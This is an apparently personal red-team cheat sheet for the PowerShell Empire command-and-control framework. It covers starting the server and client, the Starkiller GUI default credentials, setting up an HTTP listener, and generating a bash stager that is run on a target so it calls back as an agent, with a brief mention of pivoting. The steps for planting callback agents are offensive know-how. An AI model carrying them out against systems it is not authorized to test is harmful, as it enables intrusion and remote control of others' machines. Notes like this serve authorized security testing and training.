# powershell empire

* Start powershell empire server (usually done on a cloud instance for a red team)
  * sudo powershell-empire server
* Start powershell empire client
  * powershell-empire client
  * to connect to a remote client add to the end:
  * `HOSTNAME --username=USERNAME --password=PASSWORD`.
* starkiller can be used by running "starkiller" in the terminal
  * this will bring up a gui
  * the default credentials are empireadmin password123
* Choose a listener
  * uselistener http
* at a minimum we need to set host and port in the options (option names are case sensitive)
  * set host \<local ip>
  * set port 8000
* stagers are payloads, they are used to connect back to waiting listeners and create an agent when executed
  * usestager multi/bash
  * at a minimum set the listener name to the one created earlier
  * set Listener CLIHTTP
  * run 'execute' to execute the stager, this will give a script to execute on the target
* run the stager code on the target, this should check the agent in with the empire server.
* running 'agents' in the client will list every agent we can interact with
* hop listeners can be used for pivoting with empire
  \*